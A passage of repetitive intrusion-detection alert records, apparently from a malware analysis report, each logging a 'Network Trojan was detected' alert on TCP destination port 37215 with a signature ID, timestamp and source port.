              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372304
              SID:2829579
              Source Port:33592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679238
              SID:2835222
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055823
              SID:2835222
              Source Port:59946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273693
              SID:2829579
              Source Port:34248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869936
              SID:2829579
              Source Port:37530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550336
              SID:2829579
              Source Port:47368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092151
              SID:2829579
              Source Port:55808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420171
              SID:2829579
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169767
              SID:2835222
              Source Port:34610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210926
              SID:2829579
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694743
              SID:2835222
              Source Port:33530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608772
              SID:2835222
              Source Port:45416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307694
              SID:2835222
              Source Port:41374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376624
              SID:2829579
              Source Port:58440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524474
              SID:2829579
              Source Port:45740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753050
              SID:2829579
              Source Port:56644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725550
              SID:2829579
              Source Port:48678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192493
              SID:2835222
              Source Port:51014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475360
              SID:2829579
              Source Port:56208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503280
              SID:2835222
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258989
              SID:2835222
              Source Port:59246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508361
              SID:2829579
              Source Port:38996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379264
              SID:2829579
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247605
              SID:2829579
              Source Port:56940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871651
              SID:2835222
              Source Port:42364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097319
              SID:2829579
              Source Port:38778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633777
              SID:2829579
              Source Port:44084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307525
              SID:2835222
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608435
              SID:2829579
              Source Port:56332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040883
              SID:2835222
              Source Port:60994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263539
              SID:2835222
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839312
              SID:2829579
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695584
              SID:2829579
              Source Port:55576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416018
              SID:2835222
              Source Port:51524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726578
              SID:2829579
              Source Port:48010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180448
              SID:2829579
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451207
              SID:2835222
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889456
              SID:2829579
              Source Port:36282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176264
              SID:2829579
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489044
              SID:2835222
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457590
              SID:2835222
              Source Port:35700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992278
              SID:2829579
              Source Port:44230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347643
              SID:2829579
              Source Port:50828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972864
              SID:2829579
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450318
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176868
              SID:2835222
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277271
              SID:2829579
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755873
              SID:2835222
              Source Port:37982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177028
              SID:2829579
              Source Port:58156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248243
              SID:2829579
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502702
              SID:2829579
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824552
              SID:2829579
              Source Port:40386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749156
              SID:2829579
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338721
              SID:2835222
              Source Port:34390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223779
              SID:2835222
              Source Port:53212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228745
              SID:2835222
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370719
              SID:2829579
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317072
              SID:2835222
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475314
              SID:2835222
              Source Port:39952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168882
              SID:2829579
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725804
              SID:2835222
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129553
              SID:2835222
              Source Port:57022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555596
              SID:2835222
              Source Port:42092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079592
              SID:2829579
              Source Port:51008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242365
              SID:2829579
              Source Port:42462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604815
              SID:2835222
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279463
              SID:2835222
              Source Port:35390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550845
              SID:2829579
              Source Port:37084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041008
              SID:2829579
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174784
              SID:2829579
              Source Port:45240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279910
              SID:2835222
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048507
              SID:2835222
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726634
              SID:2835222
              Source Port:58398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458315
              SID:2829579
              Source Port:47638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111933
              SID:2835222
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786406
              SID:2835222
              Source Port:36774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057492
              SID:2835222
              Source Port:34974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824741
              SID:2829579
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100474
              SID:2829579
              Source Port:44572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487889
              SID:2835222
              Source Port:39064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510181
              SID:2835222
              Source Port:43582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098631
              SID:2829579
              Source Port:46784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193560
              SID:2835222
              Source Port:40096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175471
              SID:2835222
              Source Port:45956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213740
              SID:2835222
              Source Port:57902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509393
              SID:2835222
              Source Port:57234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570892
              SID:2829579
              Source Port:48058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090451
              SID:2835222
              Source Port:45092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091621
              SID:2835222
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977204
              SID:2835222
              Source Port:41996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543442
              SID:2829579
              Source Port:47004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243338
              SID:2829579
              Source Port:40508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230577
              SID:2835222
              Source Port:42332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039734
              SID:2835222
              Source Port:37078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439708
              SID:2829579
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870919
              SID:2829579
              Source Port:34480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211412
              SID:2835222
              Source Port:47296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909554
              SID:2829579
              Source Port:42014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232086
              SID:2829579
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.792246
              SID:2829579
              Source Port:42594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269241
              SID:2829579
              Source Port:38438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244473
              SID:2829579
              Source Port:39748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475056
              SID:2835222
              Source Port:59568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041735
              SID:2835222
              Source Port:36466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997066
              SID:2829579
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841466
              SID:2835222
              Source Port:53020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241922
              SID:2835222
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506404
              SID:2835222
              Source Port:43148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192732
              SID:2829579
              Source Port:38760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349067
              SID:2835222
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695228
              SID:2835222
              Source Port:35686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421237
              SID:2835222
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400525
              SID:2829579
              Source Port:35048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629752
              SID:2829579
              Source Port:56526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277399
              SID:2829579
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177190
              SID:2835222
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220388
              SID:2835222
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913796
              SID:2835222
              Source Port:58774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220656
              SID:2835222
              Source Port:44878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349625
              SID:2829579
              Source Port:34606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160909
              SID:2835222
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131692
              SID:2829579
              Source Port:41524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025624
              SID:2829579
              Source Port:59416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613701
              SID:2835222
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417658
              SID:2829579
              Source Port:52910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941797
              SID:2835222
              Source Port:37002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988866
              SID:2829579
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991990
              SID:2835222
              Source Port:60382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346959
              SID:2835222
              Source Port:48600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353541
              SID:2835222
              Source Port:37444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867553
              SID:2829579
              Source Port:49320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547443
              SID:2829579
              Source Port:33626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350425
              SID:2835222
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195337
              SID:2829579
              Source Port:56194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656041
              SID:2835222
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502448
              SID:2829579
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016461
              SID:2835222
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477709
              SID:2829579
              Source Port:37040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804612
              SID:2829579
              Source Port:44726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089574
              SID:2835222
              Source Port:59302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265516
              SID:2835222
              Source Port:43550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452272
              SID:2829579
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277624
              SID:2835222
              Source Port:60816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486750
              SID:2835222
              Source Port:53412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.825009
              SID:2835222
              Source Port:49182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867218
              SID:2835222
              Source Port:41976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759392
              SID:2835222
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377303
              SID:2829579
              Source Port:52052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014210
              SID:2835222
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528039
              SID:2829579
              Source Port:55552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027400
              SID:2829579
              Source Port:50292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550596
              SID:2829579
              Source Port:53594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229462
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223518
              SID:2829579
              Source Port:41730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480118
              SID:2835222
              Source Port:50804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759156
              SID:2835222
              Source Port:42244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197633
              SID:2829579
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302631
              SID:2829579
              Source Port:55490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271656
              SID:2829579
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710889
              SID:2835222
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908902
              SID:2829579
              Source Port:59362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941032
              SID:2835222
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910222
              SID:2829579
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242064
              SID:2829579
              Source Port:50112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991870
              SID:2835222
              Source Port:40888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042127
              SID:2835222
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218194
              SID:2829579
              Source Port:55382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839077
              SID:2835222
              Source Port:42368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129716
              SID:2829579
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424958
              SID:2835222
              Source Port:57890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487102
              SID:2835222
              Source Port:49870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195857
              SID:2835222
              Source Port:39394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402706
              SID:2829579
              Source Port:45748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485707
              SID:2829579
              Source Port:36524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868361
              SID:2829579
              Source Port:34330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972384
              SID:2835222
              Source Port:57218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092203
              SID:2829579
              Source Port:40284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528016
              SID:2829579
              Source Port:57674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553212
              SID:2835222
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408002
              SID:2829579
              Source Port:33586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523779
              SID:2835222
              Source Port:58228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694344
              SID:2829579
              Source Port:60008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660355
              SID:2835222
              Source Port:50618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264731
              SID:2829579
              Source Port:38282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679188
              SID:2829579
              Source Port:48644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823415
              SID:2829579
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487708
              SID:2835222
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606499
              SID:2835222
              Source Port:50410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268957
              SID:2829579
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403560
              SID:2829579
              Source Port:46066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638386
              SID:2835222
              Source Port:35336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565118
              SID:2829579
              Source Port:48322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058368
              SID:2829579
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991036
              SID:2835222
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223016
              SID:2835222
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057413
              SID:2829579
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276749
              SID:2829579
              Source Port:60874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
